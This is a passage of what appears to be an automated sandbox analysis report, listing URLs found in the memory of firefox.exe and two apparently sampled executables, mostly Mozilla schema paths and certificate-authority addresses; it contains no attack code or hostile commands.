                          Source: firefox.exe, 00000020.00000003.2894963446.00000253F49DA000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000020.00000002.3322305671.00000253EDF17000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000020.00000003.2812464285.00000253F49DA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://a9.com/-/spec/opensearch/1.0/
                          Source: firefox.exe, 00000020.00000003.2894963446.00000253F49DA000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000020.00000002.3322305671.00000253EDF17000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000020.00000003.2812464285.00000253F49DA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://a9.com/-/spec/opensearch/1.1/
                          Source: firefox.exe, 00000020.00000003.2894963446.00000253F49DA000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000020.00000002.3322305671.00000253EDF17000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000020.00000003.2812464285.00000253F49DA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://a9.com/-/spec/opensearchdescription/1.0/
                          Source: firefox.exe, 00000020.00000003.2894963446.00000253F49DA000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000020.00000002.3322305671.00000253EDF17000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000020.00000003.2812464285.00000253F49DA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://a9.com/-/spec/opensearchdescription/1.1/
                          Source: 24da741fb6.exe, 0000000B.00000003.2560153285.00000000059AE000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000020.00000002.3309604059.00000253ECC23000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0
                          Source: 24da741fb6.exe, 0000000B.00000003.2560153285.00000000059AE000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000020.00000002.3309604059.00000253ECC23000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0B
                          Source: firefox.exe, 00000020.00000002.2981301005.00000253E847D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://compose.mail.yahoo.co.jp/ym/Compose?To=%s
                          Source: firefox.exe, 00000020.00000002.3144688592.00000253EA2DA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://compose.mail.yahoo.co.jp/ym/Compose?To=%ss
                          Source: 24da741fb6.exe, 0000000B.00000003.2560153285.00000000059AE000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000020.00000002.3309604059.00000253ECC23000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl.rootca1.amazontrust.com/rootca1.crl0
                          Source: 24da741fb6.exe, 0000000B.00000003.2560153285.00000000059AE000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000020.00000002.3309604059.00000253ECC23000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl07
                          Source: 24da741fb6.exe, 0000000B.00000003.2560153285.00000000059AE000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000020.00000002.3309604059.00000253ECC23000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
                          Source: 24da741fb6.exe, 0000000B.00000003.2560153285.00000000059AE000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000020.00000002.3309604059.00000253ECC23000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl00
                          Source: 24da741fb6.exe, 0000000B.00000003.2560153285.00000000059AE000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000020.00000002.3309604059.00000253ECC23000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crt.rootca1.amazontrust.com/rootca1.cer0?
                          Source: firefox.exe, 00000020.00000003.2897430854.00000253EED92000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000020.00000002.3039067692.00000253E942B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://detectportal.firefox.com
                          Source: firefox.exe, 00000020.00000002.3278500608.00000253EC09F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://detectportal.firefox.com/
                          Source: firefox.exe, 00000020.00000003.2881292109.00000253F464F000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000020.00000002.3322305671.00000253EDF17000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000020.00000002.2970521081.00000253E7E2D000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000020.00000002.3333312838.00000253EE803000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://detectportal.firefox.com/canonical.html
                          Source: firefox.exe, 00000020.00000002.3322305671.00000253EDF17000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://detectportal.firefox.com/canonical.htmlNetworkError
                          Source: firefox.exe, 00000020.00000003.2820220284.00000253ED7A0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://detectportal.firefox.com/success.txt?ipv6
                          Source: firefox.exe, 00000020.00000002.2983601021.00000253E872C000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000020.00000002.2983601021.00000253E8710000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://developer.mozilla.org/en/docs/DOM:element.addEventListener
                          Source: firefox.exe, 00000020.00000002.2983601021.00000253E872C000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000020.00000002.2983601021.00000253E8710000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://developer.mozilla.org/en/docs/DOM:element.removeEventListener
                          Source: firefox.exe, 00000020.00000002.2970521081.00000253E7E8A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://exslt.org/common
                          Source: firefox.exe, 00000020.00000002.2970521081.00000253E7E8A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://exslt.org/math
                          Source: firefox.exe, 00000020.00000002.2970521081.00000253E7E8A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://exslt.org/sets
                          Source: Fwkdsz.exe, 00000007.00000002.2636511442.0000000001093000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://go.micl
                          Source: firefox.exe, 00000020.00000003.2899526882.00000253ED7C3000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000020.00000002.3320063127.00000253ED7C3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://json-schema.org/draft-04/schema#
                          Source: firefox.exe, 00000020.00000003.2899526882.00000253ED7C3000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000020.00000002.3320063127.00000253ED7C3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://json-schema.org/draft-06/schema#
                          Source: firefox.exe, 00000020.00000002.3322305671.00000253EDF17000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://json-schema.org/draft-07/schema#
                          Source: firefox.exe, 00000020.00000003.2899526882.00000253ED7C3000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000020.00000002.3320063127.00000253ED7C3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://json-schema.org/draft-07/schema#-
                          Source: firefox.exe, 00000020.00000003.2899526882.00000253ED7C3000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000020.00000002.3320063127.00000253ED7C3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://mozilla.org
                          Source: firefox.exe, 00000020.00000002.2983601021.00000253E87D6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://mozilla.org/
                          Source: firefox.exe, 00000020.00000002.3003403643.00000253E883A000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000020.00000002.3322305671.00000253EDF5A000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000020.00000002.3003403643.00000253E88AF000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000020.00000002.3003403643.00000253E889E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://mozilla.org/#/additionalProperties
                          Source: firefox.exe, 00000020.00000002.3322305671.00000253EDF5A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://mozilla.org/#/properties/addonsFeatureGate
                          Source: firefox.exe, 00000020.00000002.3322305671.00000253EDF5A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://mozilla.org/#/properties/addonsShowLessFrequentlyCap
                          Source: firefox.exe, 00000020.00000002.3322305671.00000253EDF5A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://mozilla.org/#/properties/addonsUITreatment
                          Source: firefox.exe, 00000020.00000002.3322305671.00000253EDF5A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://mozilla.org/#/properties/appId
                          Source: firefox.exe, 00000020.00000002.3322305671.00000253EDF5A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://mozilla.org/#/properties/appName
                          Source: firefox.exe, 00000020.00000002.3322305671.00000253EDF5A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://mozilla.org/#/properties/autoFillAdaptiveHistoryEnabled
                          Source: firefox.exe, 00000020.00000002.3322305671.00000253EDF5A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://mozilla.org/#/properties/autoFillAdaptiveHistoryMinCharsThreshold
                          Source: firefox.exe, 00000020.00000002.3322305671.00000253EDF5A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://mozilla.org/#/properties/autoFillAdaptiveHistoryMinCharsThresholdhttp://mozilla.org/#/propert
                          Source: firefox.exe, 00000020.00000002.3322305671.00000253EDF5A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://mozilla.org/#/properties/autoFillAdaptiveHistoryUseCountThreshold
                          Source: firefox.exe, 00000020.00000002.3322305671.00000253EDF5A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://mozilla.org/#/properties/bestMatchBlockingEnabled
                          Source: firefox.exe, 00000020.00000002.3322305671.00000253EDF5A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://mozilla.org/#/properties/bestMatchEnabledresource://normandy/lib/NormandyApi.sys.mjs
                          Source: firefox.exe, 00000020.00000002.3322305671.00000253EDF5A000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000020.00000002.3322305671.00000253EDF80000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://mozilla.org/#/properties/boolean
                          Source: firefox.exe, 00000020.00000002.3322305671.00000253EDF5A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://mozilla.org/#/properties/branches
                          Source: firefox.exe, 00000020.00000002.3322305671.00000253EDF5A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://mozilla.org/#/properties/branches/anyOf/0/items
                          Source: firefox.exe, 00000020.00000002.3322305671.00000253EDF5A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://mozilla.org/#/properties/branches/anyOf/0/items/properties/feature
                          Source: firefox.exe, 00000020.00000002.3322305671.00000253EDF5A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://mozilla.org/#/properties/branches/anyOf/0/items/properties/feature/properties/featureId
                          Source: firefox.exe, 00000020.00000002.3322305671.00000253EDF5A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://mozilla.org/#/properties/branches/anyOf/0/items/properties/feature/properties/value
                          Source: firefox.exe, 00000020.00000002.3322305671.00000253EDF5A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://mozilla.org/#/properties/branches/anyOf/0/items/properties/ratio
                          Source: firefox.exe, 00000020.00000002.3322305671.00000253EDF5A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://mozilla.org/#/properties/branches/anyOf/0/items/properties/ratiohttp://mozilla.org/#/properti
                          Source: firefox.exe, 00000020.00000002.3322305671.00000253EDF5A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://mozilla.org/#/properties/branches/anyOf/0http://mozilla.org/#/properties/branches/anyOf/1webc
                          Source: firefox.exe, 00000020.00000002.3322305671.00000253EDF5A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://mozilla.org/#/properties/branches/anyOf/1/items
                          Source: firefox.exe, 00000020.00000002.3322305671.00000253EDF5A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://mozilla.org/#/properties/branches/anyOf/1/items/properties/feature
                          Source: firefox.exe, 00000020.00000002.3322305671.00000253EDF5A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://mozilla.org/#/properties/branches/anyOf/1/items/properties/feature/properties/enabled
                          Source: firefox.exe, 00000020.00000002.3322305671.00000253EDF5A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://mozilla.org/#/properties/branches/anyOf/1/items/properties/feature/properties/featureId
                          Source: firefox.exe, 00000020.00000002.3322305671.00000253EDF5A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://mozilla.org/#/properties/branches/anyOf/1/items/properties/feature/properties/value
                          Source: firefox.exe, 00000020.00000002.3322305671.00000253EDF5A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://mozilla.org/#/properties/branches/anyOf/1/items/properties/features
                          Source: firefox.exe, 00000020.00000002.3322305671.00000253EDF5A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://mozilla.org/#/properties/branches/anyOf/1/items/properties/features/items/properties/value/ad
                          Source: firefox.exe, 00000020.00000002.3322305671.00000253EDF5A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://mozilla.org/#/properties/branches/anyOf/1/items/properties/features/itemshttp://mozilla.org/#
                          Source: firefox.exe, 00000020.00000002.3322305671.00000253EDF5A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://mozilla.org/#/properties/branches/anyOf/1/items/properties/ratio
                          Source: firefox.exe, 00000020.00000002.3322305671.00000253EDF5A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://mozilla.org/#/properties/branches/anyOf/1/items/properties/slug
                          Source: firefox.exe, 00000020.00000002.3322305671.00000253EDF5A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://mozilla.org/#/properties/branches/anyOf/1/items/properties/slugfirefox-desktop-opaqueResponse
                          Source: firefox.exe, 00000020.00000002.3322305671.00000253EDF5A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://mozilla.org/#/properties/branches/anyOf/2/items
                          Source: firefox.exe, 00000020.00000002.3322305671.00000253EDF5A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://mozilla.org/#/properties/branches/anyOf/2/items/properties/features
                          Source: firefox.exe, 00000020.00000002.3322305671.00000253EDF5A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://mozilla.org/#/properties/branches/anyOf/2/items/properties/features/items
                          Source: firefox.exe, 00000020.00000002.3322305671.00000253EDF5A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://mozilla.org/#/properties/branches/anyOf/2/items/properties/features/items/properties/value
                          Source: firefox.exe, 00000020.00000002.3322305671.00000253EDF5A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://mozilla.org/#/properties/branches/anyOf/2/items/properties/features/items/properties/value/ad
                          Source: firefox.exe, 00000020.00000002.3322305671.00000253EDF5A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://mozilla.org/#/properties/branches/anyOf/2/items/properties/ratio
                          Source: firefox.exe, 00000020.00000002.3322305671.00000253EDF5A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://mozilla.org/#/properties/branches/anyOf/2firefox-desktop-shellService-release-7
                          Source: firefox.exe, 00000020.00000002.3322305671.00000253EDF5A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://mozilla.org/#/properties/branches/anyOf/2firefox-desktop-shellService-release-7http://mozilla
                          Source: firefox.exe, 00000020.00000002.3322305671.00000253EDF5A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://mozilla.org/#/properties/bucketConfig
                          Source: firefox.exe, 00000020.00000002.3322305671.00000253EDF5A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://mozilla.org/#/properties/bucketConfig/properties/count
                          Source: firefox.exe, 00000020.00000002.3322305671.00000253EDF5A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://mozilla.org/#/properties/bucketConfig/properties/start
                          Source: firefox.exe, 00000020.00000002.3322305671.00000253EDF5A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://mozilla.org/#/properties/bucketConfig/properties/total
                          Source: firefox.exe, 00000020.00000002.3322305671.00000253EDF5A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://mozilla.org/#/properties/channel
                          Source: firefox.exe, 00000020.00000002.3003403643.00000253E883A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://mozilla.org/#/properties/csvImport
                          Source: firefox.exe, 00000020.00000002.3322305671.00000253EDF5A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://mozilla.org/#/properties/endDate
                          Source: firefox.exe, 00000020.00000002.3322305671.00000253EDF5A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://mozilla.org/#/properties/enrollmentEndDate
                          Source: firefox.exe, 00000020.00000002.3322305671.00000253EDF5A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://mozilla.org/#/properties/experimentType
                          Source: firefox.exe, 00000020.00000002.3322305671.00000253EDF5A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://mozilla.org/#/properties/exposureResults
                          Source: firefox.exe, 00000020.00000002.3322305671.00000253EDF5A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://mozilla.org/#/properties/featureIds
                          Source: firefox.exe, 00000020.00000002.3322305671.00000253EDF5A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://mozilla.org/#/properties/featureIds/itemswebcompat
                          Source: firefox.exe, 00000020.00000002.3322305671.00000253EDF5A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://mozilla.org/#/properties/featureValidationOptOut
                          Source: firefox.exe, 00000020.00000002.3322305671.00000253EDF5A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://mozilla.org/#/properties/id
                          Source: firefox.exe, 00000020.00000002.3322305671.00000253EDF5A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://mozilla.org/#/properties/isBestMatchExperiment
                          Source: firefox.exe, 00000020.00000002.3322305671.00000253EDF5A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://mozilla.org/#/properties/isEnrollmentPaused
                          Source: firefox.exe, 00000020.00000002.3322305671.00000253EDF5A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://mozilla.org/#/properties/isRollout
                          Source: firefox.exe, 00000020.00000002.3322305671.00000253EDF5A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://mozilla.org/#/properties/localizations
                          Source: firefox.exe, 00000020.00000002.3322305671.00000253EDF5A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://mozilla.org/#/properties/localizations/anyOf/0
                          Source: firefox.exe, 00000020.00000002.3322305671.00000253EDF5A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://mozilla.org/#/properties/localizations/anyOf/0/additionalProperties
                          Source: firefox.exe, 00000020.00000002.3322305671.00000253EDF5A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://mozilla.org/#/properties/localizations/anyOf/0/additionalProperties/additionalProperties
                          Source: firefox.exe, 00000020.00000002.3322305671.00000253EDF5A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://mozilla.org/#/properties/localizations/anyOf/1
                          Source: firefox.exe, 00000020.00000002.3322305671.00000253EDF5A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://mozilla.org/#/properties/mdnFeatureGate
                          Source: firefox.exe, 00000020.00000002.3322305671.00000253EDF5A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://mozilla.org/#/properties/merinoClientVariants
                          Source: firefox.exe, 00000020.00000002.3322305671.00000253EDF5A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://mozilla.org/#/properties/merinoEnabled
                          Source: firefox.exe, 00000020.00000002.3322305671.00000253EDF5A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://mozilla.org/#/properties/merinoEndpointURL
                          Source: firefox.exe, 00000020.00000002.3322305671.00000253EDF5A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://mozilla.org/#/properties/merinoProviders
                          Source: firefox.exe, 00000020.00000002.3322305671.00000253EDF5A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://mozilla.org/#/properties/merinoTimeoutMs
                          Source: firefox.exe, 00000020.00000002.3322305671.00000253EDF5A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://mozilla.org/#/properties/outcomes
                          Source: firefox.exe, 00000020.00000002.3322305671.00000253EDF5A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://mozilla.org/#/properties/outcomes/items
                          Source: firefox.exe, 00000020.00000002.3322305671.00000253EDF5A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://mozilla.org/#/properties/outcomes/items/properties/slug
                          Source: firefox.exe, 00000020.00000002.3322305671.00000253EDF5A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://mozilla.org/#/properties/pocketFeatureGate
                          Source: firefox.exe, 00000020.00000002.3322305671.00000253EDF5A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://mozilla.org/#/properties/pocketShowLessFrequentlyCap
                          Source: firefox.exe, 00000020.00000002.3322305671.00000253EDF5A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://mozilla.org/#/properties/proposedDurationresource://passwordmgr/passwordstorage.sys.mjs
                          Source: firefox.exe, 00000020.00000002.3322305671.00000253EDF5A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://mozilla.org/#/properties/proposedDurationresource://passwordmgr/passwordstorage.sys.mjsGettin
                          Source: firefox.exe, 00000020.00000002.3322305671.00000253EDF5A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://mozilla.org/#/properties/proposedEnrollment
                          Source: firefox.exe, 00000020.00000002.3322305671.00000253EDF5A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://mozilla.org/#/properties/quickSuggestAllowPositionInSuggestions
                          Source: firefox.exe, 00000020.00000002.3322305671.00000253EDF5A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://mozilla.org/#/properties/quickSuggestBlockingEnabled
                          Source: firefox.exe, 00000020.00000002.3322305671.00000253EDF5A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://mozilla.org/#/properties/quickSuggestDataCollectionEnabled
                          Source: firefox.exe, 00000020.00000002.3322305671.00000253EDF5A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://mozilla.org/#/properties/quickSuggestEnabled
                          Source: firefox.exe, 00000020.00000002.3322305671.00000253EDF5A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://mozilla.org/#/properties/quickSuggestImpressionCapsNonSponsoredEnabled
                          Source: firefox.exe, 00000020.00000002.3322305671.00000253EDF5A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://mozilla.org/#/properties/quickSuggestImpressionCapsSponsoredEnabled
                          Source: firefox.exe, 00000020.00000002.3322305671.00000253EDF5A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://mozilla.org/#/properties/quickSuggestNonSponsoredEnabled
                          Source: firefox.exe, 00000020.00000002.3322305671.00000253EDF5A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://mozilla.org/#/properties/quickSuggestNonSponsoredIndex
                          Source: firefox.exe, 00000020.00000002.3322305671.00000253EDF5A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://mozilla.org/#/properties/quickSuggestOnboardingDialogVariation
                          Source: firefox.exe, 00000020.00000002.3322305671.00000253EDF5A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://mozilla.org/#/properties/quickSuggestOnboardingDialogVariationhttp://mozilla.org/#/properties
                          Source: firefox.exe, 00000020.00000002.3322305671.00000253EDF5A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://mozilla.org/#/properties/quickSuggestRemoteSettingsDataType
                          Source: firefox.exe, 00000020.00000002.3322305671.00000253EDF5A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://mozilla.org/#/properties/quickSuggestRemoteSettingsEnabled
                          Source: firefox.exe, 00000020.00000002.3322305671.00000253EDF5A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://mozilla.org/#/properties/quickSuggestScenario
                          Source: firefox.exe, 00000020.00000002.3322305671.00000253EDF5A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://mozilla.org/#/properties/quickSuggestScoreMap
                          Source: firefox.exe, 00000020.00000002.3322305671.00000253EDF5A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://mozilla.org/#/properties/quickSuggestShouldShowOnboardingDialog
                          Source: firefox.exe, 00000020.00000002.3322305671.00000253EDF5A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://mozilla.org/#/properties/quickSuggestShowOnboardingDialogAfterNRestarts
                          Source: firefox.exe, 00000020.00000002.3322305671.00000253EDF5A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://mozilla.org/#/properties/quickSuggestSponsoredEnabled
                          Source: firefox.exe, 00000020.00000002.3322305671.00000253EDF5A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://mozilla.org/#/properties/quickSuggestSponsoredIndex
                          Source: firefox.exe, 00000020.00000002.3322305671.00000253EDF5A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://mozilla.org/#/properties/recordNavigationalSuggestionTelemetry
                          Source: firefox.exe, 00000020.00000002.3322305671.00000253EDF5A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://mozilla.org/#/properties/referenceBranch
                          Source: firefox.exe, 00000020.00000002.3322305671.00000253EDF5A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://mozilla.org/#/properties/schemaVersion
                          Source: firefox.exe, 00000020.00000002.3322305671.00000253EDF5A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://mozilla.org/#/properties/showExposureResults
                          Source: firefox.exe, 00000020.00000002.3322305671.00000253EDF5A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://mozilla.org/#/properties/showSearchTermsFeatureGate
                          Source: firefox.exe, 00000020.00000002.3322305671.00000253EDF5A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://mozilla.org/#/properties/slug
                          Source: firefox.exe, 00000020.00000002.3322305671.00000253EDF5A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://mozilla.org/#/properties/startDate
                          Source: firefox.exe, 00000020.00000002.3322305671.00000253EDF5A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://mozilla.org/#/properties/targeting
                          Source: firefox.exe, 00000020.00000002.3322305671.00000253EDF5A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://mozilla.org/#/properties/userFacingDescription
                          Source: firefox.exe, 00000020.00000002.3322305671.00000253EDF5A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://mozilla.org/#/properties/userFacingName
                          Source: firefox.exe, 00000020.00000002.3322305671.00000253EDF5A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://mozilla.org/#/properties/weatherFeatureGate
                          Source: firefox.exe, 00000020.00000002.3322305671.00000253EDF5A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://mozilla.org/#/properties/weatherKeywords
                          Source: firefox.exe, 00000020.00000002.3322305671.00000253EDF5A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://mozilla.org/#/properties/weatherKeywordsMinimumLength
                          Source: firefox.exe, 00000020.00000002.3322305671.00000253EDF5A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://mozilla.org/#/properties/weatherKeywordsMinimumLengthCap
                          Source: firefox.exe, 00000020.00000003.2898403161.00000253EE891000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000020.00000003.2885495011.00000253EF964000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000020.00000003.2789703011.00000253F4531000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000020.00000002.3301418861.00000253EC6FA000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000020.00000003.2848961803.00000253EC6FA000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000020.00000002.3298650291.00000253EC33D000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000020.00000002.3230698047.00000253EBC44000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000020.00000003.2789703011.00000253F459E000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000020.00000003.2756035227.00000253EEDDC000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000020.00000002.3331865267.00000253EE7BB000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000020.00000002.3297546038.00000253EC23B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000020.00000002.3297546038.00000253EC203000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000020.00000003.2919716041.00000253EEDDC000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000020.00000002.3297546038.00000253EC207000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 